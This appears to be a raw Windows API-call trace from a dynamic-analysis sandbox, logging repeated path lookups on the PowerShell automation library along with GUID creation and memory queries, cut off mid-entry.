GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.938] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf096d852, Data2=0x1c67, Data3=0x4cb0, Data4=([0]=0xb4, [1]=0x84, [2]=0x3c, [3]=0xb6, [4]=0x77, [5]=0xba, [6]=0x20, [7]=0xe))) returned 0x0 [0108.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.940] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1d42e531, Data2=0x4af7, Data3=0x4101, Data4=([0]=0x8d, [1]=0x68, [2]=0x4, [3]=0x34, [4]=0x8d, [5]=0x7a, [6]=0xdc, [7]=0xec))) returned 0x0 [0108.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.941] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xd84a6e1a, Data2=0xc48c, Data3=0x497f, Data4=([0]=0xa5, [1]=0x9e, [2]=0xd9, [3]=0x3e, [4]=0x49, [5]=0x1b, [6]=0x7c, [7]=0xfe))) returned 0x0 [0108.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.943] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x3d6e24fc, Data2=0x1733, Data3=0x4754, Data4=([0]=0xaa, [1]=0xc7, [2]=0xd8, [3]=0x8, [4]=0xdc, [5]=0x9c, [6]=0x52, [7]=0xf1))) returned 0x0 [0108.944] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xfa036741, Data2=0x2ead, Data3=0x4710, Data4=([0]=0x8b, [1]=0x19, [2]=0xa0, [3]=0x82, [4]=0x21, [5]=0xa8, [6]=0xb4, [7]=0x93))) returned 0x0 [0108.944] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x936cc741, Data2=0xaf22, Data3=0x40e0, Data4=([0]=0x91, [1]=0xca, [2]=0x0, [3]=0xc6, [4]=0x18, [5]=0x17, [6]=0xe6, [7]=0x6a))) returned 0x0 [0108.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.947] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x9572c5a2, Data2=0x56b2, Data3=0x422f, Data4=([0]=0x95, [1]=0xf2, [2]=0xf8, [3]=0x31, [4]=0x44, [5]=0xb9, [6]=0xc3, [7]=0x92))) returned 0x0 [0108.947] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.948] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.949] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.950] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.953] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.954] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.955] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.955] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.956] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.957] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.957] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.958] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.959] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.960] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.962] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.964] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.964] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.964] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.971] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.972] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.972] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x28212b2d, Data2=0x751d, Data3=0x43e7, Data4=([0]=0x95, [1]=0x7a, [2]=0xd4, [3]=0x76, [4]=0x5b, [5]=0x24, [6]=0xe4, [7]=0x62))) returned 0x0 [0108.973] VirtualQuery (in: lpAddress=0x10baa0, lpBuffer=0x10c960, dwLength=0x30 | out: lpBuffer=0x10c960*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.973] VirtualQuery (in: lpAddress=0x10baa0, lpBuffer=0x10c960, dwLength=0x30 | out: lpBuffer=0x10c960*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.974] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.974] VirtualQuery (in: lpAddress=0x10baa0, lpBuffer=0x10c960, dwLength=0x30 | out: lpBuffer=0x10c960*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.978] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.978] VirtualQuery (in: lpAddress=0x10baa0, lpBuffer=0x10c960, dwLength=0x30 | out: lpBuffer=0x10c960*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.979] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.980] VirtualQuery (in: lpAddress=0x10baa0, lpBuffer=0x10c960, dwLength=0x30 | out: lpBuffer=0x10c960*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.980] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: 